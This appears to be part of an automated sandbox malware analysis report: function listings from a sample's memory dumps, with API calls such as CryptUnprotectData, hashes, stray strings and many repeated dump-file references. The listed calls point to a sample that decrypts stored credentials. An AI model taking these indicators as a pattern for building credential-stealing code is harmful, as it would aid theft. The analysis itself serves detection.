Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: c2827d146c20142b85d1649adc0eacf451e55b89b27a647d14841e2ac884cc97
Instruction ID: 634373fcf194698a60edc212fcca84584300a121ded641f31ad3537ff64de9a7
Opcode Fuzzy Hash: c2827d146c20142b85d1649adc0eacf451e55b89b27a647d14841e2ac884cc97
Instruction Fuzzy Hash: F721CB75D14209ABCF04EFE4D949AEEB7B9BF58300F04852AE406E3250EB345655CBA9

Function 00257240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 0025724D
RtlAllocateHeap.NTDLL(00000000), ref: 00257254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00257281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 002572A4
LocalFree.KERNEL32(?), ref: 002572AE

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: e0fb559592b60edf5bc3cb2a66341111fabc2402020beccbb0ac8a1d0d17a354
Instruction ID: 8a7cd31f3313d677df16fadf66a1bcc45eaef84a68b91f62de352fbe7de16875
Opcode Fuzzy Hash: e0fb559592b60edf5bc3cb2a66341111fabc2402020beccbb0ac8a1d0d17a354
Instruction Fuzzy Hash: AF0112B5A40208BBDB10DFD4DD4AF9E7778EB44701F104565FB05EB2C0D6B0AA148BA9

Function 0061DA9D Relevance: 6.6, Strings: 4, Instructions: 1574COMMON

Download Yara Rule

Strings

f1V^, xrefs: 0061E4AD
@th, xrefs: 0061E615
O;, xrefs: 0061E661
G^o, xrefs: 0061DD30

Memory Dump Source

Source File: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID:
String ID: O;$@th$G^o$f1V^
API String ID: 0-1131947479
Opcode ID: 123bf8339182db16d1e2e83ef1346252bc494e6b80fb5fa1a58daacabdf8b950
Instruction ID: 54f6447bbe8002be7e9283376bc058405ce2c925d0d723c4d99ba89e4c2858eb
Opcode Fuzzy Hash: 123bf8339182db16d1e2e83ef1346252bc494e6b80fb5fa1a58daacabdf8b950
Instruction Fuzzy Hash: 30B2E5F3A0C2149FE704AE29EC8567ABBE9EF94720F16493DEAC4C3744E63558018797

Function 00611E94 Relevance: 6.6, Strings: 4, Instructions: 1560COMMON

Download Yara Rule

Strings

"Dm, xrefs: 00612C2F
g[En, xrefs: 0061218F
J`w, xrefs: 00612A13
Co7, xrefs: 00612115

Memory Dump Source

Source File: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID:
String ID: "Dm$Co7$J`w$g[En
API String ID: 0-1774033766
Opcode ID: d5b1b90ae66b8392a699e40a979657278a7c77ed6d331e34931b380c115bfa54
Instruction ID: be7bc582aed698085d623ef47fab7b0610c4d09ee72434118ddc501c4ed852ed
Opcode Fuzzy Hash: d5b1b90ae66b8392a699e40a979657278a7c77ed6d331e34931b380c115bfa54
Instruction Fuzzy Hash: BAB2C4B360C304AFE304AF29EC8567AFBE9EF94720F16492DE6C4C3744EA7558418697

Function 00268EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00255184,40000001,00000000,00000000,?,00255184), ref: 00268EC0

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 1a595bd39d7979af646994db68732da143257ab639ff6cead45e6a797801d0f1
Instruction ID: 73f5f2438bca090ca6dbde01b441c0d1fe2e8ac68c9c8bb13c5ed8d387c60e94
Opcode Fuzzy Hash: 1a595bd39d7979af646994db68732da143257ab639ff6cead45e6a797801d0f1
Instruction Fuzzy Hash: 34111C74220205FFDB00CFA4D885FA733A9AF89300F109658F9158B250DB75ECA1DBA5

Function 0061A7B1 Relevance: 5.1, Strings: 3, Instructions: 1377COMMON

Download Yara Rule

Strings

x;;}, xrefs: 0061B0A6
Ap1, xrefs: 0061B3FA
0tkz, xrefs: 0061A93D

Memory Dump Source

Source File: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0tkz$Ap1$x;;}
API String ID: 0-2620306634
Opcode ID: ee7fb2bb58667c745207019e3a7ebd2767b7fdb9e355d5ecb66d5b7d952c839f
Instruction ID: 7b03e1c069c98b047d7e14bd6ec42940dd6f2a8abe73d80a4886689ee28e647a
Opcode Fuzzy Hash: ee7fb2bb58667c745207019e3a7ebd2767b7fdb9e355d5ecb66d5b7d952c839f
Instruction Fuzzy Hash: 9E9206F3A0C2049FE3046E29EC8567AFBEAEFD4720F16853DE6C4C3744EA3558458696

Function 6C5F6CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6C5F6D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C5F6E1E

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: e58f9469197f927cbdb062eecacd2d3a408517e89035f02cc1f30227ef741bf7
Instruction ID: 9862a3b6c1b90434beff35781c219f00bfd4b33d09abde1bf24a98d984cb4f54
Opcode Fuzzy Hash: e58f9469197f927cbdb062eecacd2d3a408517e89035f02cc1f30227ef741bf7
Instruction Fuzzy Hash: ECA17C706183818FD719CF25C580BAEBBE2BFC9308F04891DE49A97751DB70A849CF92

Function 00263720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0026E118,00000000,00000001,0026E108,00000000), ref: 00263758
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 002637B0

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: 30686d14e821581a07415e837df80a598b9e34074279d40137a449d2aca20a40
Instruction ID: 199c5d6c5582629327efa8ec0165eef989f29896fb8e0e618d182d67cf7958cf
Opcode Fuzzy Hash: 30686d14e821581a07415e837df80a598b9e34074279d40137a449d2aca20a40
Instruction Fuzzy Hash: 4A41F774A10A289FDB24DB58CC95BDBB7B5BB48702F4051D8E608A72D0D7B1AEC5CF50

Function 6C6185F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C618C7C
__aulldiv.LIBCMT ref: 6C618DD7

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction ID: f3260afa0c73390e71cf0558b6bdf555b59e2a8427934747e02786db3d9dec21
Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction Fuzzy Hash: 2B327231F041198FDF18CE9CC8A17AEB7B2FB88305F16853AD506BBBA0D6349D458B95

Function 6C5F5C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6C5C4A63,?,?), ref: 6C5F5F06

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: a544901b57a275bfd3a2436678920ba57d7fdf2a939436d7d45505e9b79d4ad1
Instruction ID: c43088036bdab859f6c3428edd74479ec9315d00a33d5cbc71836b0d45ab22a0
Opcode Fuzzy Hash: a544901b57a275bfd3a2436678920ba57d7fdf2a939436d7d45505e9b79d4ad1
Instruction Fuzzy Hash: A3C1C375D012098BDB08CF55C9906DEBBF2FF8A318F68815DD865ABB44D731A906CF90

Function 005D7BA8 Relevance: 1.5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

:x}, xrefs: 005D7DDA

Memory Dump Source

Source File: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
